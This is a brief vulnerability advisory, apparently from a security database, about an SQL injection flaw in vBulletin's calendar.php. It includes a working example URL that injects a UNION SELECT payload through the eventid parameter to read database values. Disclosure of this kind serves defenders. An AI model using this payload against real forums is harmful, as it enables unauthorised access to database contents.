|
vBulletin Calendar Script SQL Injection Vulnerability
The following example was provided: http://www.example.com/[software_installation_path]/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate (Note that the underlying database must support the UNION command for this example to work.) |
|
|
Privacy Statement |
